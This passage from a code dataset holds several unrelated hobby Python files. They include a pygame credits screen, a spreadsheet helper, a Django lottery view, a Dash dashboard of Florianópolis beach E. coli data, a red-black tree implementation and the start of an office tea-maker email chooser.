\"jacagame.png\").convert_alpha()\r\n creditos = pygame.image.load(\"imagens\" + os.sep + \"creditos.jpg\").convert()\r\n mira = pygame.image.load(\"imagens\" + os.sep + \"mira.png\")\r\n\r\n #BOTAO MENU PRINCIPAL\r\n lista_botoes_menu_principal = [pygame.image.load(\"imagens\" + os.sep + \"menu_principal\" + str(indice + 1) + \".png\").convert() for indice in range(3)]\r\n botao_menu_principal = lista_botoes_menu_principal[0]\r\n medida_menu_principal = botao_menu_principal.get_size()\r\n posicao_menu_principal = (500, 500)\r\n\r\n #DESABILITA O CURSOR DO MOUSE\r\n pygame.mouse.set_visible(False)\r\n\r\n pressionado = False\r\n \r\n while True:\r\n #CAPTURA A POSICAO DO MOUSE\r\n posicao_mouse = pygame.mouse.get_pos()\r\n posicao_mouse_mira = (posicao_mouse[0] - 29, posicao_mouse[1] - 29)\r\n\r\n #CAPTURA EVENTOS PELO MOUSE\r\n clique_mouse = pygame.mouse.get_pressed()\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n exit()\r\n\r\n if event.type == KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n pygame.mixer.music.stop()\r\n return\r\n\r\n\r\n #MENU PRINCIPAL(BOTAO DE VOLTAR)\r\n if posicao_menu_principal[0] <= posicao_mouse[0] <= posicao_menu_principal[0] + medida_menu_principal[0] and posicao_menu_principal[1] <= posicao_mouse[1] <= posicao_menu_principal[1] + medida_menu_principal[1]:\r\n botao_menu_principal = lista_botoes_menu_principal[1]\r\n if som1 == False:\r\n sobre_opcao.play()\r\n som1 = True\r\n if clique_mouse[0]:\r\n botao_menu_principal = lista_botoes_menu_principal[2]\r\n pressionado = True\r\n if pressionado and not clique_mouse[0]:\r\n if som1 == True:\r\n escolhe_opcao.play()\r\n som1 = False\r\n pygame.mixer.music.stop()\r\n return\r\n else:\r\n botao_menu_principal = lista_botoes_menu_principal[0]\r\n som1 = False\r\n\r\n if not clique_mouse[0]:\r\n pressionado = False\r\n \r\n tela.blit(creditos, (0,0) )\r\n tela.blit(jaca_game, (300,250) )\r\n tela.blit(botao_menu_principal, posicao_menu_principal)\r\n tela.blit(mira, posicao_mouse_mira)\r\n\r\n pygame.display.flip()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"Creditos.py","file_name":"Creditos.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"130818799","text":"import xlsxwriter as xlsx\nclass SpreadSheetManager():\n def __init__(self, filename):\n # Manage a spread sheet for PDielec / PDGui\n self.workbook = xlsx.Workbook(filename)\n self.tab_names = ['Main', 'Settings', 'Scenarios', 'Molar Absorption','Absorption', 'Real Permittivity', 'Imaginary Permittivity', 'ATR Reflectance','Analysis']\n self.worksheets = {}\n # Positions points to where we write to next\n self.positions = {}\n self.max_col = {}\n self.max_row = {}\n for tab in self.tab_names:\n self.worksheets[tab] = self.workbook.add_worksheet(tab)\n self.positions[tab] = (0,0)\n self.max_col[tab] = 0\n self.max_row[tab] = 0\n self.name = 'Main'\n\n def selectWorkSheet(self,name):\n self.name = name\n\n def writeNextRow(self,items, row=None, col=None, check=''):\n oldRow,oldCol = self.positions[self.name]\n if col is None:\n col = oldCol\n if row is None:\n row = oldRow\n if col == 0:\n print('We have a problem, col is 0')\n self.write(row,0,check)\n for item in items:\n #print('writing ', row, col, item)\n self.write(row, col, item)\n col += 1\n row += 1\n\n def write(self,row,col,item):\n self.worksheets[self.name].write(row,col,item)\n self.max_col[self.name] = max(self.max_col[self.name], col)\n self.max_row[self.name] = max(self.max_row[self.name], row)\n self.positions[self.name] = (row+1,col+1)\n \n def delete(self):\n for row in range(0,self.max_row[self.name]):\n for col in range(0, self.max_col[self.name]):\n self.worksheets[self.name].write(row,col,'')\n self.positions[self.name] = (-1,0)\n self.max_col[self.name] = 0\n self.max_row[self.name] = 0\n\n def close(self):\n self.workbook.close()\n","sub_path":"Python/GUI/SpreadSheetManager.py","file_name":"SpreadSheetManager.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"163943539","text":"\"\"\"\nDefining Generator related views.\n\"\"\"\n\nfrom django.views import generic\nfrom .utils import get_lottery_numbers\n\nclass IndexView(generic.ListView):\n \"\"\"\n Define the basic view to show the lottery numbers.\n \"\"\"\n\n template_name = 'generator/index.html'\n context_object_name = 'lottery_number_list'\n\n def get_queryset(self):\n \"\"\"\n Returns a list of random lottery number options.\n \"\"\"\n return [get_lottery_numbers()]\n","sub_path":"website/generator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"302955153","text":"import pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport plotly.express as px\r\nimport plotly.graph_objs as go\r\nimport plotly.figure_factory as ff\r\n\r\n\r\n# reads the csv and parses the dateTime column\r\ndf = pd.read_csv('df_english.csv', sep=';', index_col=0, parse_dates=['dateTime'])\r\n\r\nfeatures_points = pd.read_excel('features_points.xlsx')\r\n\r\nmap1 = px.scatter_mapbox(\r\n features_points, lat='lat', lon='long', hover_data=['point', 'balneary', 'reference', 'location', 'fresh_water', 'drenage_beach', 'drenage_point'], \r\n mapbox_style='carto-positron', center={\"lat\": -27.61587, \"lon\": -48.48378}, zoom=8)\r\n\r\nyears = list(df.dateTime.dt.year.unique())\r\nyears.append('All the years')\r\npoints = list(df.point.sort_values().unique())\r\nstats_list = ['Description of the data (df.describe())', 'Stats of E. Coli per point', \r\n 'Balneability condition per point', 'Stats of E. Coli and amount of rain', \r\n 'Stats of E. Coli per beach and point that have drenages', 'Stats of E. Coli per year',\r\n 'Stats of E. Coli per month']\r\n\r\n#-----------------------------------------------------------------------------\r\n### Summary Stats\r\n\r\ndescribe = df.describe().reset_index()\r\n\r\nsummary_stats_point = df.groupby('point').agg({'dateTime': 'count', 'e_coli': ['mean', 'median', 'var', 'std']}).reset_index()\r\nsummary_stats_point.columns = summary_stats_point.columns.droplevel()\r\n\r\ncross_condit = pd.crosstab(df.point, df.condition, margins=True, margins_name='Total of measures').reset_index()\r\ncross_condit['Percentage Not Good'] = cross_condit['IMPRÓPRIA'] / cross_condit['Total of measures'] * 100\r\ncross_condit['Percentage Good'] = cross_condit['PRÓPRIA'] / cross_condit['Total of measures'] * 100\r\ncross_condit['Percentage Indeterminate'] = cross_condit['INDETERMINADO'] / cross_condit['Total of measures'] * 100\r\ncross_condit\r\n\r\nsummary_stats_rain = df.groupby('rain')['e_coli'].agg(['mean', 'median', 'var', 'std']).reset_index()\r\n\r\nsummary_stats_drenage = df.groupby(['fresh_water', 'drenage_beach', 'drenage_point'])['e_coli'].agg(['mean', 'median', 'var', 'std']).reset_index()\r\n\r\nsummary_stats_year = df.groupby(df.dateTime.dt.year).agg({'dateTime': 'count', 'e_coli': ['mean', 'median', 'var', 'std']}).reset_index()\r\nsummary_stats_year.columns = summary_stats_year.columns.droplevel()\r\n\r\nsummary_stats_month = df.groupby(df.dateTime.dt.month).agg({'dateTime': 'count', 'e_coli': ['mean', 'median', 'var', 'std']}).reset_index()\r\nsummary_stats_month.columns = summary_stats_month.columns.droplevel()\r\n\r\n#-----------------------------------------------------------------------------\r\n### Dashboard\r\n\r\nimport dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\nimport dash_table\r\n\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets) \r\n\r\napp.layout = html.Div([\r\n html.Div([\r\n html.H1(\r\n children='Balneability Analysis | Florianópolis - SC, Brazil',\r\n style={\r\n 'textAlign' : 'center',\r\n }\r\n ),\r\n dcc.Graph(id='map1', figure=map1)\r\n ]),\r\n \r\n html.Div([\r\n html.Div([\r\n dcc.Markdown('''###### Point'''), \r\n dcc.Dropdown(\r\n id='drop_point1',\r\n options=[{'label': i, 'value': i} for i in points],\r\n ),\r\n dcc.Markdown('''###### Year'''),\r\n dcc.Dropdown(\r\n id='drop_years1',\r\n options=[{'label': i, 'value': i} for i in years],\r\n value='All the years'\r\n ),\r\n dcc.Graph(id='graph1'),\r\n dcc.Graph(id='graph3'),\r\n dcc.Graph(id='graph5'),\r\n dcc.Graph(id='graph7'),\r\n ], className='six columns'),\r\n html.Div([\r\n dcc.Markdown('''###### Point'''), \r\n dcc.Dropdown(\r\n id='drop_point2',\r\n options=[{'label': i, 'value': i} for i in points],\r\n ),\r\n dcc.Markdown('''###### Year'''),\r\n dcc.Dropdown(\r\n id='drop_years2',\r\n options=[{'label': i, 'value': i} for i in years],\r\n value='All the years'\r\n ),\r\n dcc.Graph(id='graph2'),\r\n dcc.Graph(id='graph4'),\r\n dcc.Graph(id='graph6'),\r\n dcc.Graph(id='graph8'),\r\n ], className='six columns'),\r\n ]),\r\n \r\n html.Div([\r\n html.H4(\r\n children='Stats Tables',\r\n style={\r\n 'textAlign' : 'center',\r\n }\r\n ),\r\n dcc.Dropdown(\r\n id='drop_stats',\r\n options=[{'label': i, 'value': i} for i in stats_list],\r\n ),\r\n dash_table.DataTable(\r\n id='table',\r\n page_size=10,\r\n data=[],\r\n ),\r\n html.H1(\r\n children='__________________________________________',\r\n style={\r\n 'textAlign' : 'center',\r\n }\r\n ),\r\n html.H6(\r\n children='Data source: https://balneabilidade.ima.sc.gov.br/',\r\n style={\r\n 'textAlign' : 'center',\r\n }\r\n ),\r\n html.H6(\r\n children='Created by: Andhros Guimarães e David Guimarães',\r\n style={\r\n 'textAlign' : 'center',\r\n }\r\n ),\r\n html.H1(\r\n children='-----------------------------------------',\r\n style={\r\n 'textAlign' : 'center',\r\n }\r\n ),\r\n ]),\r\n\r\n])\r\n\r\n@app.callback(\r\n [dash.dependencies.Output('graph1', 'figure'),\r\n dash.dependencies.Output('graph3', 'figure'),\r\n dash.dependencies.Output('graph5', 'figure'),\r\n dash.dependencies.Output('graph7', 'figure')],\r\n [dash.dependencies.Input('drop_point1', 'value'),\r\n dash.dependencies.Input('drop_years1', 'value')]\r\n)\r\n\r\ndef update_graph(pointN, yearsN):\r\n \r\n if yearsN == 'All the years':\r\n filtered_df = df[df.point == pointN].sort_values(by='dateTime')\r\n \r\n else:\r\n filtered_df = df[(df.point == pointN) & (df.dateTime.dt.year == yearsN)].sort_values(by='dateTime')\r\n \r\n graph1 = px.histogram(filtered_df, x=\"e_coli\", marginal=\"rug\",\r\n histnorm='percent', range_x=[0, 25000], nbins=25, \r\n title='Histogram - Percentage of measures x values of E. Coli')\r\n \r\n graph3 = px.violin(filtered_df, y='e_coli', title='Violin Plot - Distribution of E. Coli Values')\r\n \r\n graph5 = px.box(filtered_df, y='e_coli', title='Box plot - Distribution of E. Coli Values')\r\n \r\n graph7 = px.line(filtered_df, x='dateTime', y='e_coli', hover_data=df.columns,\r\n title='Time Series - Values of E. Coli')\r\n \r\n return graph1, graph3, graph5, graph7\r\n\r\n@app.callback(\r\n [dash.dependencies.Output('graph2', 'figure'),\r\n dash.dependencies.Output('graph4', 'figure'),\r\n dash.dependencies.Output('graph6', 'figure'),\r\n dash.dependencies.Output('graph8', 'figure')],\r\n [dash.dependencies.Input('drop_point2', 'value'),\r\n dash.dependencies.Input('drop_years2', 'value')]\r\n)\r\n\r\ndef update_graph2(pointN2, yearsN2):\r\n if yearsN2 == 'All the years':\r\n filtered_df1 = df[df.point == pointN2].sort_values(by='dateTime')\r\n \r\n else:\r\n filtered_df1 = df[(df.point == pointN2) & (df.dateTime.dt.year == yearsN2)].sort_values(by='dateTime')\r\n\r\n graph2 = px.histogram(filtered_df1, x=\"e_coli\", marginal=\"rug\",\r\n histnorm='percent', range_x=[0, 25000], nbins=25,\r\n title='Histogram - Percentage of measures x values of E. Coli')\r\n \r\n graph4 = px.violin(filtered_df1, y='e_coli', title='Violin Plot - Distribution of E. Coli Values')\r\n \r\n graph6 = px.box(filtered_df1, y='e_coli', title='Box plot - Distribution of E. Coli Values')\r\n \r\n graph8 = px.line(filtered_df1, x='dateTime', y='e_coli', hover_data=df.columns,\r\n title='Time Series - Values of E. Coli')\r\n\r\n return graph2, graph4, graph6, graph8\r\n\r\n\r\n@app.callback(\r\n [dash.dependencies.Output('table', 'data'),\r\n dash.dependencies.Output('table', 'columns')],\r\n [dash.dependencies.Input('drop_stats', 'value')],\r\n)\r\n\r\ndef update_stats_table(df):\r\n \r\n if df is None:\r\n columns = []\r\n data = []\r\n \r\n elif df == 'Description of the data (df.describe())':\r\n table = describe\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Stats of E. Coli per point':\r\n table = summary_stats_point\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Balneability condition per point':\r\n table = cross_condit\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Stats of E. Coli and amount of rain':\r\n table = summary_stats_rain\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Stats of E. Coli per beach and point that have drenages':\r\n table = summary_stats_drenage\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Stats of E. Coli per year':\r\n table = summary_stats_year\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Stats of E. Coli per month':\r\n table = summary_stats_month\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n return data, columns\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)","sub_path":"Dash_EDA_english.py","file_name":"Dash_EDA_english.py","file_ext":"py","file_size_in_byte":9983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"645085934","text":"import nltk\nimport glob\n\nnltk.download('punkt')\n\nfiles_path = './brat-project-essays/*.txt'\noutput_path = './corpus_sents.txt'\n\nall_sents = []\nfor p in glob.glob(files_path):\n\tcontent = open(p).read()\n\tsents = nltk.sent_tokenize(content.decode('utf8'))\n\tall_sents = all_sents + sents\n\nall_sents = list(map(lambda x: x.encode('utf8') + '\\n', all_sents))\nopen(output_path, 'w').writelines(all_sents)","sub_path":"preprocessing/essays2sents.py","file_name":"essays2sents.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"5697916","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 26 19:35:28 2018\r\n\r\n@author: Shree\r\n\"\"\"\r\n\r\n\"\"\"from tkinter import *\r\n\r\nmaster = Tk()\r\nLabel(master, text=\"First Name\").grid(row=0)\r\nLabel(master, text=\"Last Name\").grid(row=1)\r\n\r\ne1 = Entry(master)\r\ne2 = Entry(master)\r\n\r\ne1.grid(row=0, column=1)\r\ne2.grid(row=1, column=1)\r\n\r\n\r\nmainloop( )\"\"\"\r\n\r\nfrom tkinter import *\r\nroot = Tk()\r\nroot.geometry(\"200x100\")\r\n\r\ndef retrieve_input():\r\n inputval = textBox.get(\"1.0\",\"end-1c\")\r\n print (inputval)\r\n\r\ntextBox = Text(root, height=2, width=10)\r\ntextBox.pack()\r\n\r\nbuttonCommit = Button(root, height=1, width=2, text=\"Commit\", \r\n command=retrieve_input)\r\n\r\nbuttonCommit.pack()\r\nmainloop();","sub_path":"SpamPrediction/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"379183653","text":"class Node:\n def __init__(self, key, content):\n self.key = key\n self.content = content\n self.black = False\n self.left = None\n self.right = None\n self.parent = None\n\n def is_black(self):\n return self.black\n\n def is_red(self):\n return not self.black\n\n def is_four_node(self):\n return (self.left is not None and not self.left.black) and\\\n (self.right is not None and not self.right.black)\n\n def flip_color(self):\n self.black = not self.black\n self.left.black = not self.left.black\n self.right.black = not self.right.black\n\n def is_two_node(self):\n if not self.black:\n return False\n\n # Change this to be more inclusive\n\n if (self.left is None) and (self.right is None):\n return True\n\n return (self.left is not None and self.left.black) and\\\n (self.right is not None and self.right.black)\n\n def is_left_child(self):\n return (self.parent is not None) and (self.parent.left == self)\n\n def is_right_child(self):\n return (self.parent is not None) and (self.parent.right == self)\n\n def set_right_child(self, child):\n previous = self.right\n\n self.right = child\n if self.right is not None:\n self.right.parent = self\n\n if previous is not None:\n previous.parent = None\n \n return previous\n\n def rotate_left(self):\n \"\"\" Rotate this node to the left, and return the highest node after rotation.\n\n A rotation is a local O(1) operation that restructures nodes such that\n one subtree gets closer the root, and another subtree gets one level\n further from the root. This operation preserves the in-order property\n of the RB-tree.\n\n This is used to rotate a right leaning 3-node to a left leaning 3-\n node.\n\n self x\n a x => self c\n b c a b\n \"\"\"\n parent = self.parent\n\n if self.right is None:\n raise RuntimeError(\"Can't rotate right.\")\n\n x = self.right\n\n self.right = x.left\n\n if self.right is not None:\n self.right.parent = self\n\n x.left = self\n\n if x.left is not None:\n x.left.parent = x\n\n x.parent = parent\n if parent is not None:\n if parent.left == self:\n parent.left = x\n elif parent.right == self:\n parent.right = x\n else:\n raise RuntimeError(\"Invariant broken\")\n\n (x.black, self.black) = (self.black, x.black)\n\n return x\n\n def rotate_right(self):\n \"\"\"\n self x\n x c => a self\n a b b c\n \"\"\"\n parent = self.parent\n\n if self.left is None:\n raise RuntimeError(\"Can't rotate right: no left child\")\n\n x = self.left\n\n self.left = x.right\n\n if self.left is not None:\n self.left.parent = self\n\n x.right = self\n\n if x.right is not None:\n x.right.parent = x\n\n x.parent = parent\n if parent is not None:\n if parent.left == self:\n parent.left = x\n elif parent.right == self:\n parent.right = x\n else:\n raise RuntimeError(\"Invariant broken\")\n\n (x.black, self.black) = (self.black, x.black)\n\n return x\n\n\n def set_left_child(self, child):\n previous = self.left\n\n self.left = child\n if self.left is not None:\n self.left.parent = self\n\n if previous is not None:\n previous.parent = None\n\n return previous\n\n def split(self):\n if not self.is_four_node():\n return\n\n if self.parent is None:\n # Root\n self.flip_color()\n self.black = True\n else:\n if self.parent.is_two_node():\n self.flip_color()\n else:\n # 3-node parent\n if self.is_left_child():\n if self.parent.black:\n self.flip_color()\n elif self.parent.is_left_child():\n self.parent.parent.rotate_right()\n self.flip_color()\n else:\n self.flip_color()\n self.parent.rotate_right()\n self.parent.rotate_left()\n else:\n # We are a right child.\n if self.parent.black:\n self.flip_color()\n elif self.parent.is_right_child():\n self.parent.parent.rotate_left()\n self.flip_color()\n else:\n self.flip_color()\n self.parent.rotate_left()\n self.parent.rotate_right()\n\n\n def fix_4_node(self):\n # When called, we know that the recently added node must be red.\n\n # Root\n if self.parent is None:\n # Can't happen actually....\n return\n\n # Not a four node.\n if self.parent.black:\n return\n\n t_left = self.is_left_child()\n p_left = self.parent.is_left_child()\n\n if t_left and p_left:\n self.parent.parent.rotate_right()\n elif not t_left and not p_left:\n self.parent.parent.rotate_left()\n elif t_left and not p_left:\n self.parent.rotate_right()\n self.parent.rotate_left()\n elif not t_left and p_left:\n self.parent.rotate_left()\n self.parent.rotate_right()\n\n\n def insert(self, key, content):\n if self.key is None:\n self.key = key\n self.content = content\n return self\n\n self.split()\n\n if key > self.key:\n if self.right is None:\n self.set_right_child(Node(key, content))\n self.right.fix_4_node()\n else:\n self.right.insert(key, content)\n elif key < self.key:\n if self.left is None:\n self.set_left_child(Node(key, content))\n self.left.fix_4_node()\n else:\n self.left.insert(key, content)\n\n root = self\n\n while root.parent is not None:\n root = root.parent\n\n root.black = True\n return root\n\n\n def combine(self):\n # Root nodes can not be combined.\n if self.parent is None:\n return\n\n # Skip all non two nodes.\n if not self.is_two_node():\n return\n\n if self.parent.is_two_node():\n is_left = self.is_left_child()\n # Get sibling\n if is_left:\n sibling = self.parent.right\n else:\n sibling = self.parent.left\n\n # Sanity check...\n if sibling is None:\n raise RuntimeError('Two node with only one child.')\n\n # Two node\n if sibling.is_two_node():\n # Create a four node.\n self.parent.flip_color()\n self.parent.black = True\n return\n\n # Four node\n if sibling.is_four_node():\n if is_left:\n sibling.rotate_right()\n #self.parent.rotate_left()\n else:\n top = sibling.rotate_left()\n top.left.black = True\n self.parent.rotate_right()\n\n return\n\n # Three node\n\n\n def delete(self, key):\n self.combine()\n\n if self.key == key:\n return True\n\n if (self.left is not None) and (key < self.key):\n return self.left.delete(key)\n elif (self.right is not None) and (key > self.key):\n return self.right.delete(key)\n\n return False\n\n\n def print(self, filename):\n with open(filename, 'w') as of:\n of.write('digraph rb {\\n')\n of.write(' node[shape = record];\\n')\n out = self.dot()\n of.write(out[0])\n of.write('}')\n\n\n def add_dummy_leaves(self, tag):\n if self.left is None:\n self.left = Node(tag, tag)\n self.left.black = True\n tag = chr(ord(tag) + 1)\n else:\n tag = self.left.add_dummy_leaves(tag)\n\n if self.right is None:\n self.right = Node(tag, tag)\n self.right.black = True\n tag = chr(ord(tag) + 1)\n else:\n tag = self.right.add_dummy_leaves(tag)\n\n return tag\n\n\n def height_234(self, h):\n left_height = h\n right_height = h\n\n if self.left is not None:\n if self.left.black:\n k = 1\n else:\n k = 0\n\n left_height = self.left.height_234(h + k)\n\n if self.right is not None:\n if self.right.black:\n k = 1\n else:\n k = 0\n\n right_height = self.right.height_234(h + k)\n\n return max(left_height, right_height)\n\n def dot(self, c=0):\n if self.content is None:\n return None\n\n if self.black:\n output = ' node{}[label = \"| {}|\"];\\n'.format(c, self.content)\n else:\n output = ' node{}[label = \"| {}|\", color=red];\\n'.format(c, self.content)\n\n root = c\n\n if (self.left is not None) and (self.left.content is not None):\n (o2, c) = self.left.dot(c+1) \n output += o2\n\n if self.left.black:\n output += ' \"node{}\":l->\"node{}\":m;\\n'.format(root, root+1)\n else:\n output += ' \"node{}\":l->\"node{}\":m [color=red];\\n'.format(root, root+1)\n else:\n output += ' node{} [style=\"invisible\"];\\n'.format(root+1)\n output += ' \"node{}\":l->node{} [style=\"invisible\"];\\n'.format(root, root+1)\n c = c+1\n\n if (self.right is not None) and (self.right.content is not None):\n c_plus = c+1\n (o2, c) = self.right.dot(c_plus)\n output += o2\n\n if self.right.black:\n output += ' \"node{}\":r->\"node{}\":m;\\n'.format(root, c_plus)\n else:\n output += ' \"node{}\":r->\"node{}\":m [color=red];\\n'.format(root, c_plus)\n\n else:\n output += ' node{} [style=\"invisible\"];\\n'.format(c+1)\n output += ' \"node{}\":r->node{} [style=\"invisible\"];\\n'.format(root, c+1)\n c = c+1\n\n return (output, c+1)\n\n\nclass RbTree:\n def __init__(self):\n self.root = Node(None, None)\n self.root.black = True\n\n def insert(self, key, content = None):\n if content is None:\n self.root = self.root.insert(key, key)\n else:\n self.root = self.root.insert(key, content)\n\n self.root.black = True\n\n def delete(self, key):\n self.root.delete(key)\n\n while self.root.parent is not None:\n self.root = self.root.parent\n\n def dot(self, filename, label):\n with open(filename, 'w') as of:\n of.write('digraph rb {\\n')\n of.write(' node[shape = record];\\n')\n out = self.root.dot()\n of.write(out[0])\n of.write(' labelloc=\"t\";\\n')\n of.write(' label=\"{}\";\\n'.format(label))\n of.write('}')\n \n\ndef standard(offset = 0):\n a = Node(offset + 0, \"a\")\n a.black = True\n b = Node(offset + 2, \"b\")\n b.black = True\n c = Node(offset + 4, \"c\")\n c.black = True\n d = Node(offset + 6, \"d\")\n d.black = True\n\n S = Node(offset + 1, \"S\")\n S.set_left_child(a)\n S.set_right_child(b)\n\n L = Node(offset + 5, \"L\")\n L.set_left_child(c)\n L.set_right_child(d)\n\n M = Node(offset + 3, \"M\")\n M.black = True\n M.set_left_child(S)\n M.set_right_child(L)\n\n return M\n\ndef b2():\n M = standard()\n\n e = Node(\"e\")\n P = Node(\"P\")\n P.set_right_child(e)\n P.set_left_child(M)\n\n return P\n\ndef b4():\n M = standard()\n\n e = Node(\"e\")\n f = Node(\"f\")\n P = Node(\"P\")\n P.set_right_child(e)\n P.set_left_child(M)\n P.black = False\n Q = Node(\"Q\")\n Q.set_left_child(P)\n Q.set_right_child(f)\n\n return Q\n\ndef b6():\n M = standard(3)\n\n P = Node(2, \"P\")\n P.black = True\n x = Node(1, 'x')\n x.black = True\n P.set_left_child(x)\n\n Q = Node(10, \"Q\")\n f = Node(11, 'f')\n f.black = True\n Q.set_right_child(f)\n Q.set_left_child(M)\n P.set_right_child(Q)\n\n return P\n\ndef print_rb(rb, filename):\n with open(filename, 'w') as of:\n of.write('digraph rb {\\n')\n of.write(' node[shape = record];\\n')\n out = rb.dot()\n of.write(out[0])\n of.write('}')\n\ndef insert():\n R = Node(60, 60)\n R.black = True\n R = R.insert(30, 30)\n R = R.insert(10, 10)\n R = R.insert(20, 20)\n R = R.insert(50, 50)\n R = R.insert(40, 40)\n R = R.insert(70, 70)\n R = R.insert(80, 80)\n R = R.insert(15, 15)\n R = R.insert(90, 90)\n R = R.insert(100, 100)\n\n print_rb(R, \"R.dot\")\n\n\n#insert()\n","sub_path":"joke/Gebruiker-stock/rb_tree.py","file_name":"rb_tree.py","file_ext":"py","file_size_in_byte":13342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"245224016","text":"\"\"\"Chooser Script, developed to choose between several email address\nDEVELOPED: 26/06/2014\nLAST UPDATE: 03/07/2014 14:58\n\t- Completed checking of alreday existing participent\n\t- Completed storing, loading and saving of particpent data\n\t- Continue with the unlcuky and lucky texts in sendTheMail\nDEVELOPED BY: Matt Sutton, Scott Jones\n\"\"\"\n### Import necessary modules\nimport smtplib\nimport random\nimport time\nimport sys\nimport os\nfrom time import gmtime, strftime\n### Set necessary global variables\nemailSent = 0\ntakingPart = []\n\ndef handleTheTime():\n\t\"\"\"Function to handle the current time, Timing could be an issue, check\"\"\"\n\tglobal emailSent\n\t# Grab the day, hour and minute\n\thour = int(strftime(\"%H\"))\n\tday = str(strftime(\"%a\"))\n\tminute = int(strftime(\"%m\"))\n\t#Set the next hour\n\twhile (hour != 11 and hour != 15) and (day != \"Sat\" and day != \"Sun\"):\n\t\thour = int(strftime(\"%H\"))\n\t\tday = str(strftime(\"%a\"))\n\t\tminute = int(strftime(\"%m\"))\n\t\tif hour >= 12 and hour <= 13:\n\t\t\temailSent = 0\n\t\telif hour >= 16 and hour <= 17:\n\t\t\temailSent = 0\n\t\tprint(\"The time isn't 11 or 15\")\n\t\ttime.sleep(10)\n\n\t#Send it yo\n\t#if emailSent == 0:\n\tsend = sendTheMail()\n\t\t#send.sendIt()\n\t#\temailSent = 1\n\t#time.sleep(10)\n\nclass chooseTheMakers():\n\t\"\"\"Class to choose the email addresses\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"init function, define variables\"\"\"\n\t\t# initiliase People\n\t\tself.whosInvolved()\n\t\t# Create the address list\n\t\ttry:\n\t\t\tself.addresses\n\t\t\tself.chosenNames\n\t\texcept:\n\t\t\tself.addresses = []\n\t\t\tself.chosenNames = []\n\t\tfor x in range(self.noInvolved):\n\t\t\tself.addresses.append(x)\n\t\t\tself.chosenNames.append(x)\n\t\t# Call the random function to get the addresses\n\t\tself.chooseThem()\n\n\tdef whosInvolved(self):\n\t\t\"\"\"Function to accept input from the user, determining whos taking part\"\"\"\n\t\tos.system(\"clear\")\n\t\thandle = \"\"\n\t\twhile not handle:\n\t\t\ttry:\n\t\t\t\tself.noInvolved = int(raw_input(\"Number of Participants: \"))\n\t\t\t\thandle = 1\n\t\t\t\tself.person = []\n\t\t\t\tself.toBeChosen = self.handleTheList()\n\t\t\t\tfor x in range(self.noInvolved):\n\t\t\t\t\tself.person.append(x)\n\t\t\texcept ValueError:\n\t\t\t\tprint(\"Please enter a valid number\")\n\t\tfor x in range(self.noInvolved):\n\t\t\texists = 0\n\t\t\twhile exists == 0:\n\t\t\t\tname = raw_input(\"Participant %s: \" % (x + 1))\n\t\t\t\tif name not in takingPart:\n\t\t\t\t\ttakingPart.append(name)\n\t\t\t\t\tself.person[x] = person(name)\n\t\t\t\t\texists += 1\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Participant name already in use!, try again\")\n\t\t\t\t\ttime.sleep(1)\n\t\n\tdef chooseThem(self):\n\t\t\"\"\"Function to choose the addresses\"\"\"\n\t\t#CONTINUE HERE.... choosing addresses and names and storing in lists\n\t\t#Create our list of addresses and names\n\t\tself.names = []\n\t\tself.theNumberList = []\n\t\ttempNumList = []\n\t\tfor x in range(self.noInvolved):\n\t\t\tself.names.append(self.person[x].name)\n\t\t\ttempNumList.append(x)\n\t\t#Now create our chosen and unchosen number list\n\t\tfor x in range(self.noInvolved):\n\t\t\tself.theNumberList.append(random.choice(tempNumList))\n\t\t\ttempNumList.remove(self.theNumberList[x])\n\t\t#Now create our literal chosen and unchosen lists\n\t\tself.teaMakersNames = []\n\t\tself.teaMakersEmails = []\n\t\tself.luckyOnesNames = []\n\t\tself.luckyOnesEmails = []\n\t\tfor x in range(self.toBeChosen):\n\t\t\tself.teaMakersNames.append(self.person[self.theNumberList[x]].name)\n\t\t\tself.teaMakersEmails.append(self.person[self.theNumberList[x]].email)\n\t\t\tself.person[self.theNumberList[x]].timesChosen += 1\n\t\t\tself.person[self.theNumberList[x]].profileSave()\n\t\tfor x in range(self.toBeChosen, 